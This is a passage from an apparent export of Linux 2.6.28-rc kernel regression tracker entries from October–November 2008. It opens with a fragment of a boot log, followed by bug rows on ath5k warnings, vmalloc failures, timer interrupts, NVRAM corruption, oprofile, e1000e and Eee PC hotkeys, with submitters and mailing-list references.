- 0000002000] EX TRAMPOLINE ==&gt; [0000001000 - 0000002000] #2 [0000006000 - 0000007000] TRAMPOLINE ==&gt; [0000006000 - 0000007000] #3 [0000400000 - 0000866680] TEXT DATA BSS ==&gt; [0000400000 - 0000866680] #4 [0037d0e000 - 0037fef6bf] RAMDISK ==&gt; [0037d0e000 - 0037fef6bf] #5 [0000867000 - 000086b000] INIT_PG_TABLE ==&gt; [0000867000 - 000086b000] #6 [000009d800 - 0000100000] BIOS reserved ==&gt; [000009d800 - 0000100000] #7 [0000007000 - 0000008000] PGTABLE ==&gt; [0000007000 - 0000008000] #8 [0000008000 - 000000f000] BOOTMAP ==&gt; [0000008000 - 000000f000] found SMP MP-table at [c00f6900] 000f6900 Zone PFN ranges: DMA 0x00000000 -&gt; 0x00001000 Normal 0x00001000 -&gt; 0x00038000 HighMem 0x00038000 -&gt; 0x0003e6b0 Movable zone start PFN for each node early_node_map[2] active PFN ranges 0: 0x00000000 -&gt; 0x0000009d 0: 0x00000100 -&gt; 0x0003e6b0 On node 0 totalpages: 255565 free_area_init_node: node 0, pgdat c074ca80, node_mem_map c1000000 DMA zone: 3965 pages, LIFO batch:0 Normal zone: 223520 pages, LIFO batch:31 HighMem zone: 26082 pages, LIFO batch:7 Using APIC driver default ACPI: PM-Timer IO Port: 0x1008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Enabling APIC mode: Flat. Using 1 I/O APICs ACPI: HPET id: 0x8086a201 base: 0xfed00000 Using ACPI (MADT) for SMP configuration information SMP: Allowing 2 CPUs, 0 hotplug CPUs mapped APIC to ffffb000 (fee00000) mapped IOAPIC to ffffa000 (fec00000) PM: Registered nosave memory: 000000000009d000 - 000000000009e000 PM: Registered nosave memory: 000000000009e000 - 00000000000a0000 PM: Registered nosave memory: 00000000000a0000 - 00000000000d2000 PM: Registered nosave memory: 00000000000d2000 - 00000000000d4000 PM: Registered nosave memory: 00000000000d4000 - 00000000000e0000 PM: Registered nosave memory: 00000000000e0000 - 0000000000100000 Allocating PCI resources starting at 40000000 (gap: 3f000000:b1000000) PERCPU: Allocating 40476 bytes of per cpu data NR_CPUS: 32, nr_cpu_ids: 2, nr_node_ids 1 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 253567 Kernel command line: ro root=/dev/sda2 selinux=0 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 CPU 0 irqstacks, hard=c07cf000 soft=c07af000 PID hash table entries: 4096 (order: 12, 16384 bytes) Extended CMOS year: 2000 TSC: PIT calibration confirmed by PMTIMER. TSC: using PIT calibration value Detected 1795.464 MHz processor. Console: colour VGA+ 80x25 console [tty0] enabled Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 1005516k/1022656k available (2199k kernel code, 16464k reserved, 1271k data, 264k init, 105152k highmem) virtual kernel memory layout: fixmap : 0xffc58000 - 0xfffff000 (3740 kB) pkmap : 0xff400000 - 0xff800000 (4096 kB) vmalloc : 0xf8800000 - 0xff3fe000 ( 107 MB) lowmem : 0xc0000000 - 0xf8000000 ( 896 MB) .init : 0xc076a000 - 0xc07ac000 ( 264 kB) .data : 0xc0625eb5 - 0xc0763b00 (1271 kB) .text : 0xc0400000 - 0xc0625eb5 (2199 kB) Checking if this processor honours the WP bit even in supervisor mode...Ok. CPA: page pool initialized 1 of 1 pages preallocated SLUB: Genslabs=12, HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 hpet clockevent registered Calibrating delay loop (skipped), value calculated using timer frequency.. 3590.92 BogoMIPS (lpj=7181856) Security Framework initialized SELinux: Disabled at boot. Mount-cache hash table entries: 512 CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 2048K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. using mwait in idle threads. Checking 'hlt' instruction... OK. ACPI: Core revision 20080609 ENABLING IO-APIC IRQs ..TIMER: vector=0x31 apic1=0 pin1=2 apic2=-1 pin2=-1 CPU0: Intel(R) Core(TM)2 Duo CPU T7100 @ 1.80GHz stepping 0d CPU 1 irqstacks, hard=c07d0000 soft=c07b0000 Booting processor 1/1 ip 6000 Initializing CPU#1 Calibrating delay using timer specific routine.. 3590.98 BogoMIPS (lpj=7181979) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 2048K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 1 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#1. CPU1: Intel(R) Core(TM)2 Duo CPU T7100 @ 1.80GHz stepping 0d checking TSC synchronization [CPU#0 -&gt; CPU#1]: Measured 326988 cycles TSC warp between CPUs, turning off TSC clock. Marking TSC unstable due to check_tsc_sync_source failed Brought up 2 CPUs Total of 2 processors activated (7181.91 BogoMIPS). CPU0 attaching sched-domain: domain 0: span 0-1 level MC groups: 0 1 CPU1 attaching sched-domain: domain 0: span 0-1 level MC groups: 1 0 net_namespace: 840 bytes NET: Registered protocol family 16 ACPI: ACPI Dock Station Driver ACPI FADT declares the system doesn't support PCIe ASPM, so disable it ACPI: bus type pci registered PCI: MCFG configuration 0: base f0000000 segment 0 buses 0 - 63 PCI: MCFG area at f0000000 reserved in E820 PCI: Using MMCONFIG for extended config space PCI: Using configuration type 1 for base access ACPI: EC: EC description table is found, configuring boot EC ACPI: BIOS _OSI(Linux) query honored via DMI ACPI: EC: non-query interrupt received, switching to interrupt mode ACPI: Interpreter enabled ACPI: (supports S0 S3 S4 S5) ACPI: Using IOAPIC for interrupt routing ACPI: EC: GPE = 0x12, I/O: command/status = 0x66, data = 0x62 ACPI: EC: driver started in interrupt mode ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: 0000:00:02.0 reg 10 64bit mmio: [f8100000, f81fffff] PCI: 0000:00:02.0 reg 18 32bit mmio: [e0000000, efffffff] PCI: 0000:00:02.0 reg 20 io port: [1800, 1807] PCI: 0000:00:02.1 reg 10 64bit mmio: [f8200000, f82fffff] PCI: 0000:00:19.0 reg 10 32bit mmio: [fe000000, fe01ffff] PCI: 0000:00:19.0 reg 14 32bit mmio: [fe025000, fe025fff] PCI: 0000:00:19.0 reg 18 io port: [1840, 185f] pci 0000:00:19.0: PME# supported from D0 D3hot D3cold pci 0000:00:19.0: PME# disabled PCI: 0000:00:1a.0 reg 20 io port: [1860, 187f] PCI: 0000:00:1a.1 reg 20 io port: [1880, 189f] PCI: 0000:00:1a.7 reg 10 32bit mmio: [fe226c00, fe226fff] pci 0000:00:1a.7: PME# supported from D0 D3hot D3cold pci 0000:00:1a.7: PME# disabled PCI: 0000:00:1b.0 reg 10 64bit mmio: [fe020000, fe023fff] pci 0000:00:1b.0: PME# supported from D0 D3hot D3cold pci 0000:00:1b.0: PME# disabled pci 0000:00:1c.0: PME# supported from D0 D3hot D3cold pci 0000:00:1c.0: PME# disabled pci 0000:00:1c.1: PME# supported from D0 D3hot D3cold pci 0000:00:1c.1: PME# disabled pci 0000:00:1c.2: PME# supported from D0 D3hot D3cold pci 0000:00:1c.2: PME# disabled pci 0000:00:1c.3: PME# supported from D0 D3hot D3cold pci 0000:00:1c.3: PME# disabled pci 0000:00:1c.4: PME# supported from D0 D3hot D3cold pci 0000:00:1c.4: PME# disabled PCI: 0000:00:1d.0 reg 20 io port: [18a0, 18bf] PCI: 0000:00:1d.1 reg 20 io port: [18c0, 18df] PCI: 0000:00:1d.2 reg 20 io port: [18e0, 18ff] PCI: 0000:00:1d.7 reg 10 32bit mmio: [fe227000, fe2273ff] pci 0000:00:1d.7: PME# supported from D0 D3hot D3cold pci 0000:00:1d.7: PME# disabled pci 0000:00:1f.0: quirk: region 1000-107f claimed by ICH6 ACPI/GPIO/TCO pci 0000:00:1f.0: quirk: region 1180-11bf claimed by ICH6 GPIO PCI: 0000:00:1f.1 reg 10 io port: [0, 7] PCI: 0000:00:1f.1 reg 14 io port: [0, 3] PCI: 0000:00:1f.1 reg 18 io port: [0, 7] PCI: 0000:00:1f.1 reg 1c io port: [0, 3] PCI: 0000:00:1f.1 reg 20 io port: [1c00, 1c0f] PCI: 0000:00:1f.2 reg 10 io port: [1c50, 1c57] PCI: 0000:00:1f.2 reg 14 io port: [1c44, 1c47] PCI: 0000:00:1f.2 reg 18 io port: [1c48, 1c4f] PCI: 0000:00:1f.2 reg 1c io port: [1c40, 1c43] PCI: 0000:00:1f.2 reg 20 io port: [1c20, 1c3f] PCI: 0000:00:1f.2 reg 24 32bit mmio: [fe226000, fe2267ff] pci 0000:00:1f.2: PME# supported from D3hot pci 0000:00:1f.2: PME# disabled PCI: 0000:00:1f.3 reg 10 32bit mmio: [fe227400, fe2274ff] PCI: 0000:00:1f.3 reg 20 io port: [1c60, 1c7f] PCI: bridge 0000:00:1c.0 io port: [2000, 2fff] PCI: bridge 0000:00:1c.0 32bit mmio: [fc000000, fdffffff] PCI: bridge 0000:00:1c.0 64bit mmio pref: [f8000000, f80fffff] PCI: 0000:03:00.0 reg 10 32bit mmio: [df3ff000, df3fffff] pci 0000:03:00.0: PME# supported from D0 D3hot pci 0000:03:00.0: PME# disabled PCI: bridge 0000:00:1c.1 io port: [3000, 3fff] PCI: bridge 0000:00:1c.1 32bit mmio: [dc000000, df3fffff] PCI: bridge 0000:00:1c.1 64bit mmio pref: [dfe00000, dfefffff] PCI: bridge 0000:00:1c.2 io port: [4000, 4fff] PCI: bridge 0000:00:1c.2 32bit mmio: [d8000000, d9ffffff] PCI: bridge 0000:00:1c.2 64bit mmio pref: [dfb00000, dfbfffff] PCI: bridge 0000:00:1c.3 io port: [5000, 5fff] PCI: bridge 0000:00:1c.3 32bit mmio: [d4000000, d5ffffff] PCI: bridge 0000:00:1c.3 64bit mmio pref: [df800000, df8fffff] PCI: bridge 0000:00:1c.4 io port: [6000, 6fff] PCI: bridge 0000:00:1c.4 32bit mmio: [d0000000, d1ffffff] PCI: bridge 0000:00:1c.4 64bit mmio pref: [df500000, df5fffff] PCI: 0000:15:00.0 reg 10 32bit mmio: [f8300000, f8300fff] pci 0000:15:00.0: supports D1 pci 0000:15:00.0: supports D2 pci 0000:15:00.0: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:15:00.0: PME# disabled PCI: 0000:15:00.1 reg 10 32bit mmio: [f8301000, f83017ff] pci 0000:15:00.1: supports D1 pci 0000:15:00.1: supports D2 pci 0000:15:00.1: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:15:00.1: PME# disabled PCI: 0000:15:00.2 reg 10 32bit mmio: [f8301800, f83018ff] pci 0000:15:00.2: supports D1 pci 0000:15:00.2: supports D2 pci 0000:15:00.2: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:15:00.2: PME# disabled PCI: 0000:15:00.3 reg 10 32bit mmio: [f8301c00, f8301cff] pci 0000:15:00.3: supports D1 pci 0000:15:00.3: supports D2 pci 0000:15:00.3: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:15:00.3: PME# disabled PCI: 0000:15:00.4 reg 10 32bit mmio: [f8302000, f83020ff] pci 0000:15:00.4: supports D1 pci 0000:15:00.4: supports D2 pci 0000:15:00.4: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:15:00.4: PME# disabled PCI: 0000:15:00.5 reg 10 32bit mmio: [f8302400, f83024ff] pci 0000:15:00.5: supports D1 pci 0000:15:00.5: supports D2 pci 0000:15:00.5: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:15:00.5: PME# disabled pci 0000:00:1e.0: transparent bridge PCI: bridge 0000:00:1e.0 io port: [7000, afff] PCI: bridge 0000:00:1e.0 32bit mmio: [f8300000, fbffffff] PCI: bridge 0000:00:1e.0 64bit mmio pref: [f4000000, f7ffffff] bus 00 -&gt; node 0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP2._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP3._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP4._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 9 *10 11) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 9 10 *11) ACPI: Power Resource [PUBS] (on) Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init ACPI: bus type pnp registered pnp: PnP ACPI: found 11 devices ACPI: ACPI bus type pnp unregistered usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb PCI: Using ACPI for IRQ routing NetLabel: Initializing NetLabel: domain hash size = 128 NetLabel: protocols = UNLABELED CIPSOv4 NetLabel: unlabeled traffic allowed by default hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0 hpet0: 3 64-bit timers, 14318180 Hz Switched to high resolution mode on CPU 0 Switched to high resolution mode on CPU 1 system 00:00: iomem range 0x0-0x9ffff could not be reserved system 00:00: iomem range 0xc0000-0xc3fff could not be reserved system 00:00: iomem range 0xc4000-0xc7fff could not be reserved system 00:00: iomem range 0xc8000-0xcbfff has been reserved system 00:00: iomem range 0xcc000-0xcffff has been reserved system 00:00: iomem range 0xd0000-0xd3fff could not be reserved system 00:00: iomem range 0xe0000-0xe3fff could not be reserved system 00:00: iomem range 0xe4000-0xe7fff could not be reserved system 00:00: iomem range 0xe8000-0xebfff could not be reserved system 00:00: iomem range 0xec000-0xeffff could not be reserved system 00:00: iomem range 0xf0000-0xfffff could not be reserved system 00:00: iomem range 0x100000-0x3effffff could not be reserved system 00:00: iomem range 0xfec00000-0xfed3ffff could not be reserved system 00:00: iomem range 0xfed4c000-0xffffffff could not be reserved system 00:02: ioport range 0x164e-0x164f has been reserved system 00:02: ioport range 0x1000-0x107f has been reserved system 00:02: ioport range 0x1180-0x11bf has been reserved system 00:02: ioport range 0x800-0x80f has been reserved system 00:02: ioport range 0x15e0-0x15ef has been reserved system 00:02: ioport range 0x1600-0x165f could not be reserved system 00:02: iomem range 0xf0000000-0xf3ffffff could not be reserved system 00:02: iomem range 0xfed1c000-0xfed1ffff could not be reserved system 00:02: iomem range 0xfed14000-0xfed17fff could not be reserved system 00:02: iomem range 0xfed18000-0xfed18fff could not be reserved system 00:02: iomem range 0xfed19000-0xfed19fff could not be reserved system 00:02: iomem range 0xfed45000-0xfed4bfff could not be reserved pci 0000:00:1c.0: PCI bridge, secondary bus 0000:02 pci 0000:00:1c.0: IO window: 0x2000-0x2fff pci 0000:00:1c.0: MEM window: 0xfc000000-0xfdffffff pci 0000:00:1c.0: PREFETCH window: 0x000000f8000000-0x000000f80fffff pci 0000:00:1c.1: PCI bridge, secondary bus 0000:03 pci 0000:00:1c.1: IO window: 0x3000-0x3fff pci 0000:00:1c.1: MEM window: 0xdc000000-0xdf3fffff pci 0000:00:1c.1: PREFETCH window: 0x000000dfe00000-0x000000dfefffff pci 0000:00:1c.2: PCI bridge, secondary bus 0000:04 pci 0000:00:1c.2: IO window: 0x4000-0x4fff pci 0000:00:1c.2: MEM window: 0xd8000000-0xd9ffffff pci 0000:00:1c.2: PREFETCH window: 0x000000dfb00000-0x000000dfbfffff pci 0000:00:1c.3: PCI bridge, secondary bus 0000:05 pci 0000:00:1c.3: IO window: 0x5000-0x5fff pci 0000:00:1c.3: MEM window: 0xd4000000-0xd5ffffff pci 0000:00:1c.3: PREFETCH window: 0x000000df800000-0x000000df8fffff pci 0000:00:1c.4: PCI bridge, secondary bus 0000:0d pci 0000:00:1c.4: IO window: 0x6000-0x6fff pci 0000:00:1c.4: MEM window: 0xd0000000-0xd1ffffff pci 0000:00:1c.4: PREFETCH window: 0x000000df500000-0x000000df5fffff pci 0000:15:00.0: CardBus bridge, secondary bus 0000:16 pci 0000:15:00.0: IO window: 0x007000-0x0070ff pci 0000:15:00.0: IO window: 0x007400-0x0074ff pci 0000:15:00.0: PREFETCH window: 0xf4000000-0xf7ffffff pci 0000:15:00.0: MEM window: 0x40000000-0x43ffffff pci 0000:00:1e.0: PCI bridge, secondary bus 0000:15 pci 0000:00:1e.0: IO window: 0x7000-0xafff pci 0000:00:1e.0: MEM window: 0xf8300000-0xfbffffff pci 0000:00:1e.0: PREFETCH window: 0x000000f4000000-0x000000f7ffffff pci 0000:00:1c.0: PCI INT A -&gt; GSI 20 (level, low) -&gt; IRQ 20 pci 0000:00:1c.0: setting latency timer to 64 pci 0000:00:1c.1: PCI INT B -&gt; GSI 21 (level, low) -&gt; IRQ 21 pci 0000:00:1c.1: setting latency timer to 64 pci 0000:00:1c.2: PCI INT C -&gt; GSI 22 (level, low) -&gt; IRQ 22 pci 0000:00:1c.2: setting latency timer to 64 pci 0000:00:1c.3: PCI INT D -&gt; GSI 23 (level, low) -&gt; IRQ 23 pci 0000:00:1c.3: setting latency timer to 64 pci 0000:00:1c.4: PCI INT A -&gt; GSI 20 (level, low) -&gt; IRQ 20 pci 0000:00:1c.4: setting latency timer to 64 pci 0000:00:1e.0: enabling device (0005 -&gt; 0007) pci 0000:00:1e.0: setting latency timer to 64 pci 0000:15:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:15:00.0: setting latency timer to 64 bus: 00 index 0 io port: [0, ffff] bus: 00 index 1 mmio: [0, ffffffffffffffff] bus: 02 index 0 io port: [2000, 2fff] bus: 02 index 1 mmio: [fc000000, fdffffff] bus: 02 index 2 mmio: [f8000000, f80fffff] bus: 02 index 3 mmio: [0, 0] bus: 03 index 0 io port: [3000, 3fff] bus: 03 index 1 mmio: [dc000000, df3fffff] bus: 03 index 2 mmio: [dfe00000, dfefffff] bus: 03 index 3 mmio: [0, 0] bus: 04 index 0 io port: [4000, 4fff] bus: 04 index 1 mmio: [d8000000, d9ffffff] bus: 04 index 2 mmio: [dfb00000, dfbfffff] bus: 04 index 3 mmio: [0, 0] bus: 05 index 0 io port: [5000, 5fff] bus: 05 index 1 mmio: [d4000000, d5ffffff] bus: 05 index 2 mmio: [df800000, df8fffff] bus: 05 index 3 mmio: [0, 0] bus: 0d index 0 io port: [6000, 6fff] bus: 0d index 1 mmio: [d0000000, d1ffffff] bus: 0d index 2 mmio: [df500000, df5fffff] bus: 0d index 3 mmio: [0, 0] bus: 15 index 0 io port: [7000, afff] bus: 15 index 1 mmio: [f8300000, fbffffff] bus: 15 index 2 mmio: [f4000000, f7ffffff] bus: 15 index 3 io port: [0, ffff] bus: 15 index 4 mmio: [0, ffffffffffffffff] bus: 16 index 0 io port: [7000, 70ff] bus: 16 index 1 io port: [7400, 74ff] bus: 16 index 2 mmio: [f4000000, f7ffffff] bus: 16 index 3 mmio: [40000000, 43ffffff] NET: Registered protocol family 2 IP route cache hash table entries: 32768 (order: 5, 131072 bytes) TCP established hash table entries: 131072 (order: 8, 1048576 bytes) TCP bind hash table entries: 65536 (order: 7, 524288 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered NET: Registered protocol family 1 checking if image is initramfs... it is Freeing initrd memory: 2949k freed Simple Boot Flag at 0x35 set to 0x1 apm: BIOS not found. audit: initializing netlink socket (disabled) type=2000 audit(1225269530.588:1): initialized highmem bounce pool size: 64 pages HugeTLB registered 4 MB page size, pre-allocated 0 pages VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) msgmni has been set to 1764 Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253) io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) pci 0000:00:02.0: Boot video device pcieport-dri</t>
  </si>
  <si>
    <t>ath5k triggers WARN_ON in __ieee80211_rx</t>
  </si>
  <si>
    <t>2008-10-30 09:15 UTC</t>
  </si>
  <si>
    <t>Bob Copeland</t>
  </si>
  <si>
    <t>2008-11-09 09:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc This appears to be a problem with the rate table; mac80211 is complaining that rate is out of bounds. Indeed it is -1 aka uninitialzed for that combination of band and rate index. I have the following via printk in ath5k_tasklet_rx: rxs.rate_idx = -1 sc-&gt;curband-&gt;band = 0 (2 ghz) rs.rs_rate = 0 &lt;-- that looks wrong Reported by kerneloops: http://www.kerneloops.org/guilty.php?guilty=ath5k_tasklet_rx&amp;version=2.6.28-rc&amp;start=1835008&amp;end=1867775&amp;class=warn WARNING: at /srv/devel/kernel/net/mac80211/rx.c:2203 ath5k_tasklet_rx+0x318/0x5c0() Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.28-rc1-wl #46 Call Trace: [&lt;c014744f&gt;] warn_on_slowpath+0x5f/0xa0 [&lt;c013ef69&gt;] enqueue_task_fair+0xb9/0x100 [&lt;c013ef69&gt;] enqueue_task_fair+0xb9/0x100 [&lt;c0137835&gt;] default_spin_lock_flags+0x5/0x10 [&lt;c0574fbb&gt;] _spin_lock_irqsave+0x2b/0x40 [&lt;c0151347&gt;] lock_timer_base+0x27/0x60 [&lt;c01514e0&gt;] __mod_timer+0x90/0xa0 [&lt;c03e8dea&gt;] rexmit_timer+0x36a/0x3d0 [&lt;c03aebe8&gt;] ath5k_tasklet_rx+0x318/0x5c0 [&lt;c014bfb0&gt;] tasklet_action+0x70/0x100 [&lt;c014ca97&gt;] __do_softirq+0x97/0x160 [&lt;c014ca00&gt;] __do_softirq+0x0/0x160 &lt;IRQ&gt; [&lt;c0170c50&gt;] handle_fasteoi_irq+0x0/0xe0 [&lt;c014c7bd&gt;] irq_exit+0x5d/0x80 [&lt;c012297c&gt;] do_IRQ+0xcc/0x100 [&lt;c0120aeb&gt;] common_interrupt+0x23/0x28 [&lt;c0334f88&gt;] acpi_idle_enter_bm+0x315/0x39e [&lt;c04346c4&gt;] cpuidle_idle_call+0x74/0xc0 [&lt;c011eded&gt;] cpu_idle+0x6d/0xd0 ---[ end trace 8ac847f454371229 ]---</t>
  </si>
  <si>
    <t>regression: vmalloc easily fail</t>
  </si>
  <si>
    <t>commit db64fe02258f1507e13fe5212a989922323685ce</t>
  </si>
  <si>
    <t>2008-10-30 13:44 UTC</t>
  </si>
  <si>
    <t>2008-11-22 13:24 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] regression: vmalloc easily fail. Submitter : Glauber Costa &lt;glommer@redhat.com&gt; Date : 2008-10-28 20:59 References : http://marc.info/?l=linux-kernel&amp;m=122522755530998&amp;w=4 Handled-By : Glauber Costa &lt;glommer@redhat.com&gt; Handled-By : Nick Piggin &lt;npiggin@suse.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122522755530998&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lots of extra timer interrupts costing 2W</t>
  </si>
  <si>
    <t>2.6.28-rc2-git3</t>
  </si>
  <si>
    <t>2008-10-30 14:24 UTC</t>
  </si>
  <si>
    <t>2008-11-17 11:54 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION 2.6.28-rc2-git3] lots of extra timer interrupts costing 2W Submitter : "Theodore Ts'o" &lt;tytso@mit.edu&gt; Date : 2008-10-30 2:18 References : http://marc.info/?l=linux-kernel&amp;m=122533314305315&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc2 seems to fail at powering down the monitor when it should</t>
  </si>
  <si>
    <t>2008-10-30 14:33 UTC</t>
  </si>
  <si>
    <t>2008-12-12 01:32 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc2 seems to fail at powering down the monitor when it should Submitter : Gene Heskett &lt;gene.heskett@gmail.com&gt; Date : 2008-10-30 6:39 References : http://marc.info/?l=linux-kernel&amp;m=122534879721424&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NVRAM being corrupted on ppc64 preventing boot</t>
  </si>
  <si>
    <t>2008-10-30 14:57 UTC</t>
  </si>
  <si>
    <t>2008-11-02 14:04 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc1: NVRAM being corrupted on ppc64 preventing boot (bisected) Submitter : Mel Gorman &lt;mel@csn.ul.ie&gt; Date : 2008-10-30 14:26 References : http://marc.info/?l=linux-kernel&amp;m=122537727204584&amp;w=4 Handled-By : Paul Mackerras &lt;paulus@samba.org&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>linux-2.6.28-rc2 regression : oprofile doesnt work anymore</t>
  </si>
  <si>
    <t>2008-10-30 15:03 UTC</t>
  </si>
  <si>
    <t>2008-11-10 06:30 UTC</t>
  </si>
  <si>
    <t>Subject : linux-2.6.28-rc2 regression : oprofile doesnt work anymore ? Submitter : Eric Dumazet &lt;dada1@cosmosbay.com&gt; Date : 2008-10-30 18:01 References : http://marc.info/?l=linux-kernel&amp;m=122539004100532&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>new PCMCIA device instance after resume - orinoco can't download firmware</t>
  </si>
  <si>
    <t>2008-10-30 15:39 UTC</t>
  </si>
  <si>
    <t>2008-11-16 11:22 UTC</t>
  </si>
  <si>
    <t>Subject : [Orinoco-devel] 2.6.28-rc2: new PCMCIA device instance after resume - orinoco can't download firmware Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Date : 2008-10-28 19:19 References : http://marc.info/?l=linux-wireless&amp;m=122522165719760&amp;w=4 Handled-By : Dave &lt;kilroyd@googlemail.com&gt; Patch : http://marc.info/?l=linux-wireless&amp;m=122539058601588&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>USB/INPUT: slab error in cache_alloc_debugcheck_after(): double free?</t>
  </si>
  <si>
    <t>2008-10-30 16:39 UTC</t>
  </si>
  <si>
    <t>2008-12-02 15:20 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc2: USB/INPUT: slab error in cache_alloc_debugcheck_after(): double free? Submitter : Helge Deller &lt;deller@gmx.de&gt; Date : 2008-10-30 23:11 References : http://marc.info/?l=linux-kernel&amp;m=122540833301394&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc2 hates my e1000e</t>
  </si>
  <si>
    <t>2008-10-30 17:03 UTC</t>
  </si>
  <si>
    <t>2008-11-02 04:32 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc2 hates my e1000e Submitter : Jonathan Corbet &lt;corbet@lwn.net&gt; Date : 2008-10-30 23:44 References : http://marc.info/?l=linux-kernel&amp;m=122541033604141&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hotkeys stop working after prolonged usage - Asus Eee PC</t>
  </si>
  <si>
    <t>2008-10-31 03:21 UTC</t>
  </si>
  <si>
    <t>2008-11-12 21:26 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: ACPI testing, EC fast interrupt patch on top of 2.6.27. E.g. acpi/test tree commit v2.6.27-87-g0fbb372. Without this fix, there's a bug where the hotkeys will stop working much sooner. Therefore this is not a regression from 2.6.27 - instead, it extends the EeePC hotkey regression which was already present in 2.6.27. Earliest failing kernel version: 2.6.28-rc2 (rc1 doesn't boot due to ata_piix breakage). Distribution: Ubuntu 8.04 Hardware Environment: Asus Eee PC 701. Problem Description: EC dies, hotkeys stop working, ACPI power button stops working, other strange things happen e.g. suspend/resume seems to hang, battery information probably stops being updated. Steps to reproduce: 1. Boot on battery, no AC power. (The battery may or may not matter, but I've been playing it safe). 2. Wait for X login screen 3. Hold down "brightness up" key until full brightness is reached. 4. Hold down "brightness down" key until minimum brightness is reached. 5. Repeat steps 3&amp;4. 25 repititions (yes, twenty five) are required to reproduce reliably. I think I stumbled upon this using a different and more complicated sequence; this one may be tedious but it seems fairly reliable and it's nice and simple</t>
  </si>
  <si>
    <t>2.6.27-7</t>
  </si>
  <si>
    <t>cdrom: missing compat ioctls</t>
  </si>
  <si>
    <t>2008-10-31 14:02 UTC</t>
  </si>
  <si>
    <t>2008-12-07 02:18 UTC</t>
